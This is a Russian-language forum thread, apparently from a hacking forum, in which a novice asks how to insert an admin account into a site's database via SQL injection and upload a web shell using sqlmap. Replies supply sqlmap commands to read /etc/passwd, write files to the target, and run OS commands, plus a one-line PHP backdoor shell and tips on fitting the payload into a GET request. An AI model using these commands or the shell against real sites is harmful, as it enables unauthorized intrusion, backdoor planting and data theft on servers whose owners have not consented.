Старый 01.02.2012, 06:47   #1
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
Question sqlmap пару вопросов

Всем доброго времени суток.Не судите строго, но как в sqlmap добавить данные?
есть бд: earth
есть table: administrator
есть columns:
Код:
username
password
как добавить в table под именем admnistrator админа с юзернеймом Josh и пассвордом qwerty?

плюс есть ещё один вопрос:как добавить шелл через sqlmap?я знаю можно узнать хэш>расшифровать>подключит ся к mysql и добавить оттуда, но данный способ не доступен.
Shadowfolder вне форума   Ответить с цитированием
Старый 01.02.2012, 11:43   #2
madnet
 
Аватар для madnet
 
Регистрация: 21.09.2010
Сообщений: 5
Репутация: 1
По умолчанию

sqlmap, на сколько помню, не предоставляет функционала для внедрения записи, да и крайне редко это удается в sql инъекциях, можешь попробывать вручную составить запрос, используя
Цитата:
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
Для получения шела, при достаточных правах можно использовать запись в файл, либо исполнение команд, для этого есть ключи
Цитата:
File system access:
These options can be used to access the back-end database management
system underlying file system.

--file-read=RFILE Read a file from the back-end DBMS file system
--file-write=WFILE Write a local file on the back-end DBMS file system
--file-dest=DFILE Back-end DBMS absolute filepath to write to

Operating system access:
These options can be used to access the back-end database management
system underlying operating system.

--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process' user privilege escalation
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
madnet вне форума   Ответить с цитированием
Старый 01.02.2012, 13:54   #3
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

я новичок в sqlmap-e...
я читал то, что тут запостили, но мне нужен пример...кто работал, дайте примеров пожалуйста...
Shadowfolder вне форума   Ответить с цитированием
Старый 01.02.2012, 14:33   #4
madnet
 
Аватар для madnet
 
Регистрация: 21.09.2010
Сообщений: 5
Репутация: 1
По умолчанию

В двух словах
sqlmap -u "http://...?id=" --file-read="/etc/passwd" - чтение файлов
sqlmap -u "http://...?id=" --file-write='/var/tmp/1.txt' --file-dest='/tmp/1.txt' - запись файла, где file-write - файл на твоей машине, file-dest - куда сохранить на удаленной
sqlmap -u "http://...?id=" --os-cmd=ls - выполнить команду, скрипт запросит пути куда лить оболочку, его тип и т.д.

Для новичка удобно запускат скрипт
sqlmap --wizard
тогда по шагам он будет запрашивать необходимую информацию
madnet вне форума   Ответить с цитированием
Старый 01.02.2012, 17:16   #5
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

Спасибо!Когда пытаюсь записать файл, то выйёт ошибку [WARNING] the injection is on a GET parametr and the file to be writen hexadecial value is 132218 bytes, this might cause errors in the file writing process
как решить эту проблему?
Shadowfolder вне форума   Ответить с цитированием
Старый 01.02.2012, 17:53   #6
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

файл слишком большой, в GET-параметр не поместится. Решение: либо заливать файл поменьше, либо использовать инъекцию в POST-параметре.
Raz0r вне форума   Ответить с цитированием
Старый 01.02.2012, 17:54   #7
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Shadowfolder Как бы намекает, что сунуть 130 килов не есть гуд, пробуй лить мини шелл например
Цитата:
<?assert($_REQUEST[blabla]);?>
Lostnull вне форума   Ответить с цитированием
Старый 01.02.2012, 18:12   #8
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

как так, ведь мой шелл весит всего 65 килобайт...
что за мини шелл, подскажите
Shadowfolder вне форума   Ответить с цитированием
Старый 01.02.2012, 18:51   #9
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

все же попытаюсь
Цитата:
Сообщение от Shadowfolder Посмотреть сообщение
как так, ведь мой шелл весит всего 65 килобайт...
65 килобайт так же не влезут в GET-параметр, web-сервер не примет такой запрос, максимум можно отправить 4 кб.
Цитата:
Сообщение от Shadowfolder Посмотреть сообщение
что за мини шелл, подскажите
Написали же <?assert($_REQUEST[blabla]);?>
Raz0r вне форума   Ответить с цитированием
Старый 01.02.2012, 19:11   #10
lefty
 
Аватар для lefty
 
Регистрация: 01.09.2011
Сообщений: 50
Репутация: 13
По умолчанию

Shadowfolder

Цитата:
как добавить в table под именем admnistrator админа с юзернеймом Josh и пассвордом qwerty?
это возможно, если у тебя иньекция в insert/update запросе, либо субд на которой все бегает поддерживает stacked queries.

уверен что это так в твоем случае ?
lefty вне форума   Ответить с цитированием
Ответ

Метки
sqlmap для новичков, sqlmap shell

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot